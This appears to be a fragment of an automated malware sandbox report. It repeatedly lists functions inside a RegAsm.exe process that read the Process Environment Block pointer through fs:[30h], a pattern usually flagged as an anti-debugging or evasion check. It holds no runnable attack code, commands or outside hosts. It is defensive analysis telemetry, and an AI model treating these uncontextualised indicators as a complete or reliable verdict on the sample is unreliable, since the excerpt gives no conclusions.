        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032201F8 mov eax, dword ptr fs:[00000030h]5_2_032201F8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C51CB mov eax, dword ptr fs:[00000030h]5_2_032C51CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B61C3 mov eax, dword ptr fs:[00000030h]5_2_032B61C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B61C3 mov eax, dword ptr fs:[00000030h]5_2_032B61C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322D1D0 mov eax, dword ptr fs:[00000030h]5_2_0322D1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0322D1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F51ED mov eax, dword ptr fs:[00000030h]5_2_031F51ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA020 mov eax, dword ptr fs:[00000030h]5_2_031EA020
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC020 mov eax, dword ptr fs:[00000030h]5_2_031EC020
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5060 mov eax, dword ptr fs:[00000030h]5_2_032C5060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F2050 mov eax, dword ptr fs:[00000030h]5_2_031F2050
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov ecx, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321C073 mov eax, dword ptr fs:[00000030h]5_2_0321C073
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B052 mov eax, dword ptr fs:[00000030h]5_2_0321B052
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329705E mov ebx, dword ptr fs:[00000030h]5_2_0329705E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329705E mov eax, dword ptr fs:[00000030h]5_2_0329705E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F5096 mov eax, dword ptr fs:[00000030h]5_2_031F5096
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED08D mov eax, dword ptr fs:[00000030h]5_2_031ED08D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B60B8 mov eax, dword ptr fs:[00000030h]5_2_032B60B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B60B8 mov ecx, dword ptr fs:[00000030h]5_2_032B60B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F208A mov eax, dword ptr fs:[00000030h]5_2_031F208A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D090 mov eax, dword ptr fs:[00000030h]5_2_0321D090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D090 mov eax, dword ptr fs:[00000030h]5_2_0321D090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322909C mov eax, dword ptr fs:[00000030h]5_2_0322909C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032150E4 mov eax, dword ptr fs:[00000030h]5_2_032150E4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032150E4 mov ecx, dword ptr fs:[00000030h]5_2_032150E4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032320F0 mov ecx, dword ptr fs:[00000030h]5_2_032320F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC0F0 mov eax, dword ptr fs:[00000030h]5_2_031EC0F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C50D9 mov eax, dword ptr fs:[00000030h]5_2_032C50D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F80E9 mov eax, dword ptr fs:[00000030h]5_2_031F80E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032720DE mov eax, dword ptr fs:[00000030h]5_2_032720DE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032190DB mov eax, dword ptr fs:[00000030h]5_2_032190DB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA0E3 mov ecx, dword ptr fs:[00000030h]5_2_031EA0E3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320F720 mov eax, dword ptr fs:[00000030h]5_2_0320F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320F720 mov eax, dword ptr fs:[00000030h]5_2_0320F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320F720 mov eax, dword ptr fs:[00000030h]5_2_0320F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B972B mov eax, dword ptr fs:[00000030h]5_2_032B972B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C720 mov eax, dword ptr fs:[00000030h]5_2_0322C720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C720 mov eax, dword ptr fs:[00000030h]5_2_0322C720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF72E mov eax, dword ptr fs:[00000030h]5_2_032AF72E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F0710 mov eax, dword ptr fs:[00000030h]5_2_031F0710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326C730 mov eax, dword ptr fs:[00000030h]5_2_0326C730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03225734 mov eax, dword ptr fs:[00000030h]5_2_03225734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7703 mov eax, dword ptr fs:[00000030h]5_2_031F7703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F5702 mov eax, dword ptr fs:[00000030h]5_2_031F5702
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F5702 mov eax, dword ptr fs:[00000030h]5_2_031F5702
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322273C mov eax, dword ptr fs:[00000030h]5_2_0322273C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322273C mov ecx, dword ptr fs:[00000030h]5_2_0322273C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322273C mov eax, dword ptr fs:[00000030h]5_2_0322273C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C700 mov eax, dword ptr fs:[00000030h]5_2_0322C700
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F973A mov eax, dword ptr fs:[00000030h]5_2_031F973A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F973A mov eax, dword ptr fs:[00000030h]5_2_031F973A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9730 mov eax, dword ptr fs:[00000030h]5_2_031E9730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9730 mov eax, dword ptr fs:[00000030h]5_2_031E9730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03220710 mov eax, dword ptr fs:[00000030h]5_2_03220710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322F71F mov eax, dword ptr fs:[00000030h]5_2_0322F71F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322F71F mov eax, dword ptr fs:[00000030h]5_2_0322F71F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F3720 mov eax, dword ptr fs:[00000030h]5_2_031F3720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F0750 mov eax, dword ptr fs:[00000030h]5_2_031F0750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203740 mov eax, dword ptr fs:[00000030h]5_2_03203740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203740 mov eax, dword ptr fs:[00000030h]5_2_03203740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203740 mov eax, dword ptr fs:[00000030h]5_2_03203740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C3749 mov eax, dword ptr fs:[00000030h]5_2_032C3749
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322674D mov esi, dword ptr fs:[00000030h]5_2_0322674D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322674D mov eax, dword ptr fs:[00000030h]5_2_0322674D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322674D mov eax, dword ptr fs:[00000030h]5_2_0322674D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F8770 mov eax, dword ptr fs:[00000030h]5_2_031F8770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03274755 mov eax, dword ptr fs:[00000030h]5_2_03274755
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232750 mov eax, dword ptr fs:[00000030h]5_2_03232750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232750 mov eax, dword ptr fs:[00000030h]5_2_03232750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB765 mov eax, dword ptr fs:[00000030h]5_2_031EB765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB765 mov eax, dword ptr fs:[00000030h]5_2_031EB765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB765 mov eax, dword ptr fs:[00000030h]5_2_031EB765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB765 mov eax, dword ptr fs:[00000030h]5_2_031EB765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327F7AF mov eax, dword ptr fs:[00000030h]5_2_0327F7AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327F7AF mov eax, dword ptr fs:[00000030h]5_2_0327F7AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327F7AF mov eax, dword ptr fs:[00000030h]5_2_0327F7AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327F7AF mov eax, dword ptr fs:[00000030h]5_2_0327F7AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327F7AF mov eax, dword ptr fs:[00000030h]5_2_0327F7AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032797A9 mov eax, dword ptr fs:[00000030h]5_2_032797A9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D7B0 mov eax, dword ptr fs:[00000030h]5_2_0321D7B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C37B6 mov eax, dword ptr fs:[00000030h]5_2_032C37B6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF78A mov eax, dword ptr fs:[00000030h]5_2_032AF78A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF7BA mov eax, dword ptr fs:[00000030h]5_2_031EF7BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F07AF mov eax, dword ptr fs:[00000030h]5_2_031F07AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032127ED mov eax, dword ptr fs:[00000030h]5_2_032127ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032127ED mov eax, dword ptr fs:[00000030h]5_2_032127ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032127ED mov eax, dword ptr fs:[00000030h]5_2_032127ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FC7C0 mov eax, dword ptr fs:[00000030h]5_2_031FC7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F57C0 mov eax, dword ptr fs:[00000030h]5_2_031F57C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F57C0 mov eax, dword ptr fs:[00000030h]5_2_031F57C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F57C0 mov eax, dword ptr fs:[00000030h]5_2_031F57C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F47FB mov eax, dword ptr fs:[00000030h]5_2_031F47FB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F47FB mov eax, dword ptr fs:[00000030h]5_2_031F47FB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FD7E0 mov ecx, dword ptr fs:[00000030h]5_2_031FD7E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03226620 mov eax, dword ptr fs:[00000030h]5_2_03226620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03228620 mov eax, dword ptr fs:[00000030h]5_2_03228620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E627 mov eax, dword ptr fs:[00000030h]5_2_0320E627
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F3616 mov eax, dword ptr fs:[00000030h]5_2_031F3616
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F3616 mov eax, dword ptr fs:[00000030h]5_2_031F3616
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5636 mov eax, dword ptr fs:[00000030h]5_2_032C5636
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322F603 mov eax, dword ptr fs:[00000030h]5_2_0322F603
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03221607 mov eax, dword ptr fs:[00000030h]5_2_03221607
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320260B mov eax, dword ptr fs:[00000030h]5_2_0320260B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326E609 mov eax, dword ptr fs:[00000030h]5_2_0326E609
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F262C mov eax, dword ptr fs:[00000030h]5_2_031F262C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
